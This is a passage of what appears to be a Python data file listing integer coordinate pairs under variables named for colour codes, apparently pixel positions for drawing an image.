131), (72, 140), (72, 142), (73, 98), (73, 102), (73, 103), (73, 104), (73, 105), (73, 106), (73, 107), (73, 108), (73, 109), (73, 110), (73, 111), (73, 112), (73, 113), (73, 115), (73, 119), (73, 131), (73, 139), (73, 141), (74, 99), (74, 101), (74, 102), (74, 103), (74, 104), (74, 105), (74, 106), (74, 107), (74, 108), (74, 109), (74, 110), (74, 111), (74, 112), (74, 113), (74, 117), (74, 119), (74, 130), (74, 131), (74, 138), (74, 140), (75, 100), (75, 102), (75, 103), (75, 104), (75, 105), (75, 106), (75, 107), (75, 108), (75, 109), (75, 110), (75, 111), (75, 113), (75, 117), (75, 118), (75, 119), (75, 129), (75, 131), (75, 136), (75, 140), (76, 100), (76, 102), (76, 103), (76, 104), (76, 105), (76, 106), (76, 107), (76, 108), (76, 109), (76, 110), (76, 111), (76, 113), (76, 116), (76, 118), (76, 128), (76, 130), (76, 131), (76, 133), (76, 134), (76, 139), (77, 101), (77, 103), (77, 104), (77, 105), (77, 106), (77, 107), (77, 108), (77, 109), (77, 110), (77, 111), (77, 112), (77, 113), (77, 116), (77, 118), (77, 128), (77, 130), (77, 131), (77, 135), (77, 136), (77, 137), (77, 138), (77, 140), (78, 101), (78, 103), (78, 104), (78, 105), (78, 106), (78, 107), (78, 108), (78, 109), (78, 110), (78, 111), (78, 112), (78, 113), (78, 114), (78, 115), (78, 118), (78, 127), (78, 129), (78, 130), (78, 131), (78, 132), (78, 133), (78, 134), (78, 135), (78, 136), (78, 137), (78, 138), (78, 140), (78, 146), (78, 148), (79, 101), (79, 103), (79, 104), (79, 105), (79, 106), (79, 107), (79, 108), (79, 109), (79, 110), (79, 112), (79, 117), (79, 118), (79, 127), (79, 129), (79, 130), (79, 131), (79, 132), (79, 133), (79, 134), (79, 135), (79, 136), (79, 137), (79, 138), (79, 139), (79, 141), (79, 144), (79, 147), (80, 86), (80, 87), (80, 88), (80, 89), (80, 90), (80, 101), (80, 103), (80, 104), (80, 105), (80, 106), (80, 107), (80, 108), (80, 109), (80, 110), (80, 112), (80, 117), (80, 119), (80, 126), (80, 128), (80, 129), (80, 130), (80, 131), (80, 132), (80, 133), (80, 134), (80, 135), (80, 136), (80, 137), (80, 138), (80, 139), (80, 140), (80, 143), (80, 146), (81, 80), (81, 82), (81, 83), (81, 84), (81, 85), (81, 86), (81, 87), (81, 88), (81, 89), (81, 90), (81, 91), (81, 92), (81, 93), (81, 94), (81, 100), (81, 102), (81, 103), (81, 104), (81, 105), (81, 106), (81, 107), (81, 108), (81, 109), (81, 110), (81, 112), (81, 117), (81, 118), (81, 120), (81, 125), (81, 127), (81, 128), (81, 129), (81, 130), (81, 131), (81, 132), (81, 133), (81, 134), (81, 135), (81, 136), (81, 137), (81, 138), (81, 139), (81, 140), (81, 141), (81, 144), (81, 146), (82, 95), (82, 96), (82, 97), (82, 98), (82, 101), (82, 102), (82, 103), (82, 104), (82, 105), (82, 106), (82, 107), (82, 108), (82, 109), (82, 110), (82, 112), (82, 117), (82, 119), (82, 122), (82, 123), (82, 126), (82, 127), (82, 128), (82, 129), (82, 130), (82, 131), (82, 132), (82, 133), (82, 134), (82, 135), (82, 136), (82, 137), (82, 138), (82, 139), (82, 140), (82, 141), (82, 142), (82, 143), (82, 144), (82, 146), (83, 93), (83, 100), (83, 101), (83, 102), (83, 103), (83, 104), (83, 105), (83, 106), (83, 107), (83, 108), (83, 109), (83, 110), (83, 111), (83, 113), (83, 116), (83, 117), (83, 118), (83, 119), (83, 120), (83, 125), (83, 126), (83, 127), (83, 128), (83, 129), (83, 130), (83, 131), (83, 132), (83, 133), (83, 134), (83, 135), (83, 136), (83, 137), (83, 138), (83, 139), (83, 140), (83, 141), (83, 142), (83, 143), (83, 144), (83, 145), (83, 147), (84, 93), (84, 95), (84, 96), (84, 97), (84, 98), (84, 99), (84, 100), (84, 101), (84, 102), (84, 103), (84, 104), (84, 105), (84, 106), (84, 107), (84, 108), (84, 109), (84, 110), (84, 111), (84, 112), (84, 115), (84, 117), (84, 118), (84, 119), (84, 120), (84, 121), (84, 122), (84, 123), (84, 124), (84, 125), (84, 126), (84, 127), (84, 128), (84, 129), (84, 130), (84, 131), (84, 132), (84, 133), (84, 134), (84, 135), (84, 136), (84, 137), (84, 138), (84, 139), (84, 140), (84, 141), (84, 142), (84, 147), (85, 93), (85, 95), (85, 96), (85, 97), (85, 98), (85, 99), (85, 100), (85, 101), (85, 102), (85, 103), (85, 104), (85, 105), (85, 106), (85, 107), (85, 108), (85, 109), (85, 110), (85, 111), (85, 112), (85, 113), (85, 116), (85, 117), (85, 118), (85, 119), (85, 120), (85, 121), (85, 122), (85, 123), (85, 124), (85, 125), (85, 126), (85, 127), (85, 128), (85, 129), (85, 130), (85, 131), (85, 132), (85, 133), (85, 134), (85, 135), (85, 136), (85, 137), (85, 138), (85, 139), (85, 140), (85, 143), (85, 144), (85, 146), (86, 94), (86, 95), (86, 96), (86, 97), (86, 98), (86, 99), (86, 100), (86, 101), (86, 102), (86, 103), (86, 104), (86, 105), (86, 106), (86, 107), (86, 108), (86, 109), (86, 110), (86, 111), (86, 112), (86, 113), (86, 114), (86, 115), (86, 116), (86, 117), (86, 118), (86, 119), (86, 120), (86, 121), (86, 122), (86, 123), (86, 124), (86, 125), (86, 126), (86, 127), (86, 128), (86, 129), (86, 130), (86, 131), (86, 132), (86, 133), (86, 134), (86, 135), (86, 138), (86, 139), (86, 140), (86, 142), (87, 94), (87, 96), (87, 97), (87, 98), (87, 99), (87, 100), (87, 101), (87, 102), (87, 103), (87, 104), (87, 105), (87, 106), (87, 107), (87, 108), (87, 109), (87, 110), (87, 111), (87, 112), (87, 113), (87, 114), (87, 115), (87, 116), (87, 117), (87, 118), (87, 119), (87, 120), (87, 121), (87, 122), (87, 123), (87, 124), (87, 125), (87, 126), (87, 127), (87, 128), (87, 129), (87, 133), (87, 134), (87, 136), (87, 137), (87, 140), (88, 95), (88, 97), (88, 98), (88, 99), (88, 100), (88, 101), (88, 102), (88, 103), (88, 104), (88, 105), (88, 106), (88, 107), (88, 108), (88, 109), (88, 110), (88, 111), (88, 112), (88, 113), (88, 114), (88, 115), (88, 116), (88, 117), (88, 118), (88, 119), (88, 120), (88, 121), (88, 122), (88, 123), (88, 124), (88, 125), (88, 126), (88, 127), (88, 130), (88, 131), (88, 132), (88, 133), (88, 135), (88, 138), (88, 140), (89, 95), (89, 97), (89, 98), (89, 99), (89, 100), (89, 101), (89, 102), (89, 103), (89, 104), (89, 105), (89, 106), (89, 107), (89, 108), (89, 109), (89, 110), (89, 111), (89, 112), (89, 113), (89, 114), (89, 115), (89, 116), (89, 117), (89, 118), (89, 119), (89, 120), (89, 121), (89, 122), (89, 123), (89, 124), (89, 129), (89, 133), (89, 134), (89, 140), (90, 95), (90, 97), (90, 98), (90, 99), (90, 100), (90, 101), (90, 102), (90, 103), (90, 104), (90, 105), (90, 106), (90, 107), (90, 108), (90, 109), (90, 110), (90, 111), (90, 112), (90, 113), (90, 114), (90, 115), (90, 116), (90, 117), (90, 118), (90, 119), (90, 120), (90, 121), (90, 122), (90, 125), (90, 127), (90, 133), (90, 140), (91, 73), (91, 74), (91, 94), (91, 96), (91, 97), (91, 98), (91, 99), (91, 100), (91, 101), (91, 102), (91, 103), (91, 104), (91, 105), (91, 106), (91, 107), (91, 108), (91, 109), (91, 110), (91, 111), (91, 112), (91, 113), (91, 114), (91, 115), (91, 116), (91, 117), (91, 118), (91, 119), (91, 120), (91, 123), (91, 124), (91, 133), (91, 140), (92, 72), (92, 74), (92, 75), (92, 94), (92, 96), (92, 97), (92, 98), (92, 99), (92, 100), (92, 101), (92, 102), (92, 103), (92, 104), (92, 105), (92, 106), (92, 107), (92, 108), (92, 109), (92, 110), (92, 111), (92, 112), (92, 113), (92, 114), (92, 115), (92, 116), (92, 117), (92, 118), (92, 122), (92, 141), (93, 77), (93, 78), (93, 79), (93, 80), (93, 81), (93, 82), (93, 93), (93, 95), (93, 96), (93, 97), (93, 98), (93, 99), (93, 100), (93, 101), (93, 102), (93, 103), (93, 104), (93, 105), (93, 106), (93, 107), (93, 108), (93, 109), (93, 110), (93, 111), (93, 112), (93, 113), (93, 114), (93, 115), (93, 116), (93, 120), (93, 132), (93, 141), (94, 78), (94, 83), (94, 84), (94, 85), (94, 86), (94, 87), (94, 88), (94, 89), (94, 90), (94, 91), (94, 94), (94, 95), (94, 96), (94, 97), (94, 98), (94, 99), (94, 100), (94, 101), (94, 102), (94, 103), (94, 104), (94, 105), (94, 106), (94, 107), (94, 108), (94, 109), (94, 110), (94, 111), (94, 112), (94, 113), (94, 114), (94, 118), (94, 132), (94, 141), (94, 142), (95, 79), (95, 82), (95, 93), (95, 94), (95, 95), (95, 96), (95, 97), (95, 98), (95, 99), (95, 100), (95, 101), (95, 102), (95, 103), (95, 104), (95, 105), (95, 106), (95, 107), (95, 108), (95, 109), (95, 110), (95, 111), (95, 112), (95, 113), (95, 116), (96, 81), (96, 84), (96, 85), (96, 86), (96, 87), (96, 88), (96, 89), (96, 90), (96, 91), (96, 92), (96, 93), (96, 94), (96, 95), (96, 96), (96, 97), (96, 98), (96, 99), (96, 100), (96, 101), (96, 102), (96, 103), (96, 104), (96, 105), (96, 106), (96, 107), (96, 108), (96, 109), (96, 110), (96, 111), (96, 112), (96, 114), (96, 131), (97, 82), (97, 85), (97, 86), (97, 87), (97, 88), (97, 89), (97, 90), (97, 91), (97, 92), (97, 93), (97, 94), (97, 95), (97, 96), (97, 97), (97, 98), (97, 99), (97, 100), (97, 101), (97, 102), (97, 103), (97, 104), (97, 105), (97, 106), (97, 107), (97, 108), (97, 109), (97, 110), (97, 111), (97, 113), (97, 131), (98, 84), (98, 86), (98, 87), (98, 88), (98, 89), (98, 90), (98, 91), (98, 92), (98, 93), (98, 94), (98, 95), (98, 96), (98, 97), (98, 98), (98, 99), (98, 100), (98, 101), (98, 102), (98, 103), (98, 104), (98, 105), (98, 106), (98, 107), (98, 108), (98, 109), (98, 110), (98, 112), (98, 130), (98, 131), (99, 85), (99, 87), (99, 88), (99, 89), (99, 90), (99, 91), (99, 92), (99, 93), (99, 94), (99, 95), (99, 96), (99, 97), (99, 98), (99, 99), (99, 100), (99, 101), (99, 102), (99, 103), (99, 104), (99, 105), (99, 106), (99, 107), (99, 108), (99, 109), (99, 111), (99, 129), (99, 131), (100, 86), (100, 88), (100, 89), (100, 90), (100, 91), (100, 92), (100, 93), (100, 94), (100, 95), (100, 96), (100, 97), (100, 98), (100, 99), (100, 100), (100, 101), (100, 102), (100, 103), (100, 104), (100, 105), (100, 106), (100, 107), (100, 108), (100, 110), (100, 129), (100, 131), (101, 86), (101, 88), (101, 89), (101, 90), (101, 91), (101, 92), (101, 93), (101, 94), (101, 95), (101, 96), (101, 97), (101, 98), (101, 99), (101, 100), (101, 101), (101, 102), (101, 103), (101, 104), (101, 105), (101, 106), (101, 107), (101, 108), (101, 110), (101, 128), (102, 75), (102, 77), (102, 78), (102, 86), (102, 88), (102, 89), (102, 90), (102, 91), (102, 92), (102, 93), (102, 94), (102, 95), (102, 96), (102, 97), (102, 98), (102, 99), (102, 100), (102, 101), (102, 102), (102, 103), (102, 104), (102, 105), (102, 106), (102, 107), (102, 108), (102, 110), (102, 127), (103, 80), (103, 82), (103, 83), (103, 84), (103, 85), (103, 86), (103, 87), (103, 88), (103, 89), (103, 90), (103, 91), (103, 92), (103, 93), (103, 94), (103, 95), (103, 96), (103, 97), (103, 98), (103, 99), (103, 100), (103, 101), (103, 102), (103, 103), (103, 104), (103, 105), (103, 106), (103, 107), (103, 108), (103, 110), (103, 127), (104, 81), (104, 86), (104, 87), (104, 88), (104, 89), (104, 90), (104, 91), (104, 92), (104, 93), (104, 94), (104, 95), (104, 96), (104, 102), (104, 103), (104, 104), (104, 105), (104, 106), (104, 107), (104, 108), (104, 110), (104, 115), (104, 117), (104, 118), (104, 119), (104, 120), (104, 121), (104, 122), (104, 123), (104, 124), (104, 127), (105, 81), (105, 83), (105, 84), (105, 85), (105, 88), (105, 89), (105, 90), (105, 91), (105, 92), (105, 93), (105, 94), (105, 97), (105, 98), (105, 99), (105, 100), (105, 103), (105, 104), (105, 105), (105, 106), (105, 107), (105, 108), (105, 110), (105, 114), (105, 127), (105, 135), (106, 82), (106, 86), (106, 87), (106, 89), (106, 90), (106, 91), (106, 92), (106, 93), (106, 96), (106, 102), (106, 104), (106, 105), (106, 106), (106, 107), (106, 108), (106, 109), (106, 110), (106, 111), (106, 112), (106, 113), (106, 116), (106, 117), (106, 118), (106, 119), (106, 120), (106, 121), (106, 122), (106, 123), (106, 124), (106, 125), (106, 127), (107, 85), (107, 89), (107, 90), (107, 91), (107, 92), (107, 103), (107, 105), (107, 106), (107, 107), (107, 108), (107, 109), (107, 110), (107, 114), (107, 115), (107, 116), (107, 117), (107, 118), (107, 119), (107, 120), (107, 121), (107, 122), (107, 123), (107, 124), (107, 125), (107, 127), (108, 81), (108, 83), (108, 89), (108, 93), (108, 103), (108, 105), (108, 106), (108, 107), (108, 108), (108, 109), (108, 110), (108, 111), (108, 112), (108, 113), (108, 114), (108, 115), (108, 116), (108, 117), (108, 118), (108, 119), (108, 120), (108, 121), (108, 122), (108, 123), (108, 124), (108, 125), (108, 127), (109, 80), (109, 89), (109, 92), (109, 103), (109, 105), (109, 106), (109, 107), (109, 108), (109, 109), (109, 110), (109, 111), (109, 112), (109, 113), (109, 114), (109, 115), (109, 116), (109, 117), (109, 118), (109, 119), (109, 120), (109, 121), (109, 122), (109, 123), (109, 124), (109, 126), (110, 67), (110, 69), (110, 70), (110, 71), (110, 72), (110, 73), (110, 74), (110, 75), (110, 76), (110, 77), (110, 79), (110, 103), (110, 105), (110, 106), (110, 107), (110, 108), (110, 109), (110, 110), (110, 111), (110, 112), (110, 113), (110, 114), (110, 115), (110, 116), (110, 117), (110, 118), (110, 119), (110, 120), (110, 123), (110, 126), (111, 76), (111, 78), (111, 103), (111, 104), (111, 105), (111, 106), (111, 109), (111, 110), (111, 111), (111, 112), (111, 113), (111, 114), (111, 115), (111, 116), (111, 117), (111, 118), (111, 119), (111, 122), (111, 125), (112, 104), (112, 106), (112, 108), (112, 110), (112, 111), (112, 112), (112, 113), (112, 114), (112, 115), (112, 116), (112, 117), (112, 118), (112, 120), (113, 104), (113, 106), (113, 109), (113, 112), (113, 113), (113, 114), (113, 115), (113, 116), (113, 117), (114, 104), (114, 106), (114, 110), (114, 112), (114, 113), (114, 114), (114, 115), (114, 116), (115, 104), (115, 106), (115, 111), (115, 113), (115, 114), (115, 115), (116, 104), (116, 112), (117, 104), (117, 105), (117, 113), (117, 115), (118, 105)) coordinates_771286 = ((145, 124), (146, 122), (146, 125), (147, 117), (147, 119), (147, 120), (147, 123), (147, 124), (147, 126), (148, 117), (148, 121), (148, 122), (148, 123), (148, 124), (149, 118), (149, 121), (149, 122), (149, 123), (149, 124), (149, 125), (149, 127), (150, 119), (150, 123), (150, 124), (150, 125), (150, 126), (150, 128), (151, 121), (151, 122), (151, 125), (151, 126), (151, 128), (152, 123), (152, 124), (152, 127), (152, 129), (153, 129), (154, 127), (154, 129), (155, 128), (155, 129), (156, 129)) coordinates_781286 = ((90, 131), (91, 129), (91, 131), (92, 128), (92, 130), (93, 124), (93, 125), (93, 126), (93, 130), (94, 122), (94, 127), (94, 128), (94, 130), (95, 120), (95, 123), (95, 124), (95, 125), (95, 126), (95, 127), (95, 129), (96, 118), (96, 122), (96, 123), (96, 124), (96, 125), (96, 126), (96, 127), (96, 129), (97, 116), (97, 120), (97, 121), (97, 122), (97, 123), (97, 124), (97, 125), (97, 126), (97, 128), (98, 115), (98, 118), (98, 119), (98, 120), (98, 121), (98, 122), (98, 123), (98, 124), (98, 125), (98, 126), (98, 128), (99, 113), (99, 116), (99, 117), (99, 118), (99, 119), (99, 120), (99, 121), (99, 122), (99, 123), (99, 124), (99, 125), (99, 127), (100, 112), (100, 115), (100, 116), (100, 117), (100, 118), (100, 119), (100, 120), (100, 121), (100, 122), (100, 123), (100, 124), (100, 126), (101, 112), (101, 114), (101, 125), (102, 112), (102, 115), (102, 116), (102, 117), (102, 118), (102, 119), (102, 120), (102, 121), (102, 122), (102, 124), (103, 112), (103, 114), (104, 112), (104, 113)) coordinates_cf2090 = ((161, 112), (161, 114), (162, 112), (162, 113), (163, 111), (163, 113), (164, 111), (164, 113), (165, 111), (165, 113), (166, 111), (166, 113), (167, 111), (167, 113), (168, 111), (168, 113), (169, 111), (169, 112), (170, 111), (170, 112), (171, 111), (171, 112), (172, 111), (172, 112), (173, 111), (173, 112), (174, 111), (174, 112), (175, 111), (175, 112), (176, 111), (177, 111), (177, 113), (178, 111), (178, 114), (179, 111), (179, 113), (179, 114), (180, 112), (180, 115), (181, 113), (181, 115), (182, 110), (182, 113), (182, 116), (183, 110), (183, 112), (183, 113), (183, 114), (183, 116), (184, 110), (184, 115), (185, 111), (185, 114)) coordinates_efe68_c = ((162, 116), (163, 116), (164, 115), (164, 116), (165, 115), (165, 116), (166, 115), (166, 116), (167, 115), (167, 116), (168, 115), (168, 116), (169, 115), (169, 116), (169, 123), (170, 116), (170, 122), (170, 124), (171, 114), (171, 116), (171, 121), (171, 124), (172, 114), (172, 116), (172, 121), (172, 124), (173, 114), (173, 116), (173, 120), (173, 122), (173, 124), (174, 114), (174, 116), (174, 120), (174, 121), (174, 122), (174, 124), (175, 114), (175, 116), (175, 117), (175, 118), (175, 120), (175, 121), (175, 122), (175, 124), (175, 128), (176, 115), (176, 117), (176, 119), (176, 120), (176, 121), (176, 122), (176, 124), (176, 128), (177, 115), (177, 118), (177, 119), (177, 120), (177, 121), (177, 122), (177, 124), (177, 128), (178, 116), (178, 118), (178, 119), (178, 120), (178, 121), (178, 122), (178, 124), (178, 128), (178, 129), (179, 118), (179, 120), (179, 121), (179, 123), (179, 128), (179, 129), (180, 118), (180, 120), (180, 121), (180, 123), (180, 127), (180, 129), (181, 119), (181, 122), (181, 127), (181, 129), (182, 119), (182, 122), (182, 127), (182, 129), (183, 119), (183, 122), (183, 127), (183, 130), (184, 119), (184, 121), (184, 123), (184, 126), (184, 128), (184, 129), (184, 131), (185, 119), (185, 121), (185, 122), (185, 124), (185, 125), (185, 127), (185, 128), (185, 129), (185, 130), (185, 132), (186, 119), (186, 122), (186, 123), (186, 126), (186, 127), (186, 128), (186, 129), (186, 133), (187, 123), (187, 124), (187, 125), (187, 126), (187, 130), (187, 131), (188, 122), (188, 127), (188, 129), (189, 123), (189, 125), (189, 126)) coordinates_31_cd32 = ((167, 140), (168, 140), (169, 141), (170, 133), (170, 135), (170, 141), (171, 132), (171, 136), (172, 131), (172, 133), (172, 134), (172, 135), (172, 137), (172, 142), (172, 144), (173, 130), (173, 132), (173, 133), (173, 134), (173, 135), (173, 136), (173, 138), (173, 142), (173, 145), (174, 130), (174, 132), (174, 133), (174, 134), (174, 135), (174, 136), (174, 137), (174, 139), (174, 143), (174, 146), (175, 130), (175, 131), (175, 132), (175, 133), (175, 134), (175, 135), (175, 136), (175, 137), (175, 139), (175, 143), (176, 131), (176, 133), (176, 134), (176, 135), (176, 136), (176, 137), (176, 139), (176, 142), (176, 144), (176, 146), (177, 131), (177, 133), (177, 134), (177, 135), (177, 136), (177, 137), (177, 138), (177, 139), (177, 140), (177, 141), (177, 143), (178, 131), (178, 133), (178, 134), (178, 135), (178, 136), (178, 137), (178, 138), (178, 139), (178, 142), (179, 131), (179, 133), (179, 134), (179, 135), (179, 136), (179, 137), (179, 138), (179, 139), (179, 141), (179, 142), (180, 131), (180, 133), (180, 134), (180, 135), (180, 136), (180, 137), (180, 138), (180, 139), (180, 140), (180, 142), (181, 132), (181, 140), (181, 142), (182, 133), (182, 135), (182, 136), (182, 137), (182, 138), (182, 143), (183, 140), (183, 143), (184, 142)) coordinates_d02090 = ((59, 122), (59, 124), (60, 122), (60, 125), (61, 122), (61, 125), (62, 122), (62, 125), (63, 123), (63, 125), (64, 123), (64, 125), (64, 126), (65, 122), (65, 124), (65, 126), (66, 122), (66, 124), (66, 126), (67, 122), (67, 124), (67, 126), (68, 122), (68, 125), (69, 122), (69, 125), (70, 122), (70, 124), (71, 121), (71, 123), (72, 121), (72, 123), (73, 121), (73, 123), (74, 121), (74, 123), (75, 121), (75, 122), (76, 121), (76, 122), (77, 121), (77, 122), (78, 122), (79, 121), (80, 123)) coordinates_f0_e68_c = ((58, 129), (59, 127), (59, 129), (59, 130), (59, 131), (59, 132), (59, 134), (60, 127), (60, 134), (61, 127), (61, 129), (61, 132), (61, 134), (62, 127), (62, 133), (62, 134), (63, 128), (63, 133), (63, 135), (64, 128), (64, 132), (64, 135), (65, 128), (65, 132), (65, 135), (66, 128), (66, 132), (66, 134), (66, 136), (67, 128), (67, 132), (67, 134), (67, 136), (68, 128), (68, 132), (68, 134), (68, 136), (69, 127), (69, 128), (69, 132), (69, 134), (69, 136), (70, 126), (70, 128), (70, 129), (70, 132), (70, 134), (70, 136), (71, 125), (71, 127), (71, 129), (71, 133), (71, 135), (72, 125), (72, 127), (72, 129), (72, 133), (72, 135), (73, 125), (73, 128), (73, 133), (73, 135), (74, 125), (74, 127), (74, 133), (75, 125), (75, 126), (76, 126), (77, 125), (77, 126), (78, 125), (79, 125)) coordinates_32_cd32 = ((58, 140), (59, 136), (59, 138), (59, 141), (60, 136), (60, 139), (60, 141), (61, 136), (61, 138), (61, 139), (61, 140), (61, 142), (62, 137), (62, 139), (62, 140), (62, 142), (63, 137), (63, 139), (63, 142), (64, 137), (64, 139), (64, 140), (64, 143), (64, 148), (64, 150), (65, 138), (65, 139), (65, 142), (65, 144), (65, 146), (65, 147), (66, 138), (66, 139), (66, 142), (66, 148), (66, 149), (66, 151), (67, 138), (67, 140), (67, 143), (67, 144), (67, 146), (67, 147), (67, 148), (67, 149), (67, 151), (68, 138), (68, 140), (68, 147), (68, 148), (68, 149), (68, 151), (69, 138), (69, 139), (69, 147), (69, 149), (69, 151), (70, 138), (70, 139), (70, 146), (70, 148), (70, 149), (70, 150), (70, 151), (71, 138), (71, 145), (71, 147), (71, 148), (71, 149), (71, 150), (71, 151), (71, 154), (72, 137), (72, 144), (72, 146), (72, 147), (72, 148), (72, 149), (72, 150), (72, 151), (72, 152), (72, 155), (73, 137), (73, 143), (73, 145), (73, 146), (73, 147), (73, 148), (73, 149), (73, 150), (73, 151), (73, 152), (73, 153), (73, 154), (73, 156), (74, 142), (74, 145), (74, 146), (74, 147), (74, 149), (74, 150), (74, 151), (74, 152), (74, 153), (74, 154), (74, 155), (74, 158), (75, 142), (75, 144), (75, 148), (75, 150), (75, 151), (75, 152), (75, 153), (75, 154), (75, 155), (75, 156), (75, 159), (76, 142), (76, 146), (76, 149), (76, 150), (76, 151), (76, 152), (76, 153), (76, 154), (76, 155), (76, 156), (76, 157), (76, 159), (77, 142), (77, 144), (77, 150), (77, 152), (77, 153), (77, 154), (77, 155), (77, 156), (77, 158), (78, 150), (78, 152), (78, 153), (78, 154), (78, 155), (78, 157), (79, 150), (79, 152), (79, 153), (79, 154), (79, 155), (79, 157), (80, 149), (80, 151), (80, 152), (80, 153), (80, 154), (80, 156), (81, 148), (81, 155), (82, 148), (82, 150), (82, 151), (82, 152), (82, 154)) coordinates_00_ff7_f = ((107, 66), (107, 67), (107, 68), (107, 69), (107, 70), (107, 71), (107, 72), (107, 73), (107, 74), (107, 75), (107, 76), (107, 77), (107, 79), (108, 64), (108, 66), (108, 67), (108, 68), (108, 69), (108, 70), (108, 71), (108, 72), (108, 73), (108, 74), (108, 75), (108, 76), (108, 78), (109, 63), (109, 65), (110, 62), (110, 64), (111, 62), (111, 63), (112, 62), (112, 63), (113, 62), (114, 62), (114, 63), (115, 62)) coordinates_cc5_c5_c = ((142, 140), (142, 141), (143, 140), (143, 142), (144, 139), (144, 142), (145, 139), (145, 141), (145, 143), (146, 138), (146, 141), (146, 143), (147, 137), (147, 139), (147, 140), (147, 142), (147, 144), (148, 136), (148, 141), (148, 144), (149, 136), (149, 137), (149, 142), (149, 145), (150, 136), (150, 137), (150, 142), (150, 144), (150, 146), (151, 136), (151, 137), (151, 142), (151, 144), (151, 146), (152, 136), (152, 137), (152, 142), (152, 144), (152, 145), (152, 147), (153, 136), (153, 137), (153, 142), (153, 144), (153, 145), (153, 146), (153, 148), (154, 136), (154, 137), (154, 142), (154, 144), (154, 145), (154, 146), (154, 147), (154, 149), (155, 136), (155, 142), (155, 144), (155, 145), (155, 146), (155, 147), (155, 149), (156, 142), (156, 144), (156, 145), (156, 146), (156, 147), (156, 148), (156, 150), (157, 142), (157, 144), (157, 145), (157, 146), (157, 147), (157, 148), (157, 150), (158, 142), (158, 144), (158, 145), (158, 146), (158, 147), (158, 148), (158, 149), (158, 151), (159, 143), (159, 145), (159, 146), (159, 147), (159, 148), (159, 149), (159, 151), (160, 144), (160, 146), (160, 147), (160, 148), (160, 149), (160, 151), (161, 145), (161, 147), (161, 148), (161, 149), (161, 150), (161, 152), (162, 146), (162, 148), (162, 149), (162, 150), (162, 152), (163, 147), (163, 149), (163, 150), (163, 152), (164, 148), (164, 150), (164, 152), (165, 141), (165, 149), (165, 152), (166, 141), (166, 142), (166, 150), (166, 152), (167, 142), (167, 150), (167, 152), (168, 143), (168, 145), (168, 149), (168, 152), (169, 144), (169, 146), (169, 147), (169, 150), (169, 152), (170, 145), (170, 149), (170, 150), (170, 152), (170, 153), (171, 146), (171, 148), (171, 149), (171, 150), (171, 151), (171, 153), (172, 147), (172, 149), (172, 150), (172, 152), (173, 148), (173, 150), (173, 152), (174, 148), (174, 151), (175, 149), (175, 151), (176, 150), (176, 151)) coordinates_cd5_c5_c = ((84, 149), (84, 151), (84, 153), (85, 148), (86, 149), (86, 150), (86, 152), (87, 146), (87, 148), (87, 149), (87, 150), (87, 152), (88, 142), (88, 144), (88, 145), (88, 148), (88, 149), (88, 151), (89, 142), (89, 146), (89, 147), (89, 148), (89, 150), (90, 137), (90, 138), (90, 142), (90, 144), (90, 145), (90, 146), (90, 147), (90, 150), (91, 137), (91, 142), (91, 144), (91, 145), (91, 146), (91, 147), (91, 149), (92, 137), (92, 138), (92, 143), (92, 145), (92, 146), (92, 147), (93, 137), (93, 144), (93, 147), (94, 137), (94, 144), (94, 146), (95, 137), (95, 139), (95, 143), (95, 146), (96, 137), (96, 139), (96, 140), (96, 141), (96, 142), (96, 143), (96, 144), (96, 146), (97, 137), (97, 139), (97, 143), (97, 145), (98, 137), (98, 139), (98, 140), (98, 141), (98, 142), (99, 138), (99, 140), (99, 141), (99, 144), (100, 139), (100, 143), (101, 140), (101, 141)) coordinates_fea600 = ((162, 104), (163, 104), (164, 104), (164, 105), (165, 104), (165, 106), (166, 104), (166, 107), (166, 109), (167, 92), (167, 104), (167, 106), (167, 109), (168, 91), (168, 92), (168, 104), (168, 106), (168, 107), (168, 109), (169, 90), (169, 93), (169, 104), (169, 107), (169, 109), (170, 89), (170, 92), (170, 94), (170, 104), (170, 106), (170, 109), (171, 91), (171, 92), (171, 94), (171, 103), (171, 104), (171, 107), (171, 109), (172, 88), (172, 90), (172, 91), (172, 93), (172, 102), (172, 104), (172, 108), (172, 109), (173, 87), (173, 89), (173, 90), (173, 92), (173, 100), (173, 104), (173, 109), (174, 87), (174, 89), (174, 91), (174, 99), (174, 102), (174, 104), (175, 88), (175, 90), (175, 92), (175, 97), (175, 101), (175, 102), (175, 104), (176, 89), (176, 92), (176, 93), (176, 94), (176, 95), (176, 96), (176, 99), (176, 100), (176, 101), (176, 102), (176, 103), (176, 105), (177, 90), (177, 97), (177, 98), (177, 99), (177, 100), (177, 101), (177, 102), (177, 103), (177, 104), (177, 106), (178, 92), (178, 95), (178, 96), (178, 97), (178, 102), (178, 105), (178, 107), (179, 93), (179, 94), (179, 97), (179, 104), (179, 106), (179, 108), (180, 95), (180, 97), (180, 102), (180, 105), (180, 109), (181, 97), (181, 106), (181, 108), (182, 107), (182, 108), (183, 108)) coordinates_fea501 = ((59, 115), (59, 117), (59, 119), (60, 106), (60, 107), (60, 114), (60, 118), (60, 120), (61, 104), (61, 108), (61, 109), (61, 113), (61, 117), (61, 118), (61, 120), (62, 101), (62, 102), (62, 110), (62, 111), (62, 115), (62, 120), (63, 98), (63, 100), (63, 104), (63, 105), (63, 106), (63, 107), (63, 108), (63, 114), (64, 95), (64, 97), (64, 102), (64, 110), (64, 112), (64, 113), (64, 114), (65, 90), (65, 92), (65, 93), (65, 94), (65, 98), (65, 99), (65, 101), (65, 110), (65, 113), (66, 88), (66, 89), (66, 96), (66, 97), (66, 98), (66, 99), (66, 101), (66, 111), (66, 113), (67, 87), (67, 90), (67, 91), (67, 92), (67, 93), (67, 94), (67, 95), (67, 97), (67, 98), (67, 100), (67, 111), (67, 112), (68, 85), (68, 88), (68, 89), (68, 90), (68, 91), (68, 92), (68, 96), (68, 98), (68, 100), (68, 117), (69, 84), (69, 87), (69, 88), (69, 89), (69, 90), (69, 92), (69, 97), (69, 100), (69, 117), (70, 83), (70, 86), (70, 87), (70, 88), (70, 89), (70, 90), (70, 91), (70, 93), (70, 98), (70, 100), (71, 83), (71, 85), (71, 86), (71, 87), (71, 88), (71, 89), (71, 90), (71, 91), (71, 92), (71, 94), (72, 83), (72, 85), (72, 86), (72, 87), (72, 88), (72, 89), (72, 90), (72, 91), (72, 92), (72, 93), (72, 95), (73, 84), (73, 86), (73, 87), (73, 88), (73, 89), (73, 90), (73, 91), (73, 92), (73, 93), (73, 94), (73, 96), (74, 85), (74, 87), (74, 88), (74, 89), (74, 90), (74, 91), (74, 92), (74, 93), (74, 94), (75, 86), (75, 88), (75, 89), (75, 90), (75, 91), (75, 92), (75, 93), (75, 94), (75, 95), (75, 97), (76, 86), (76, 87), (76, 88), (76, 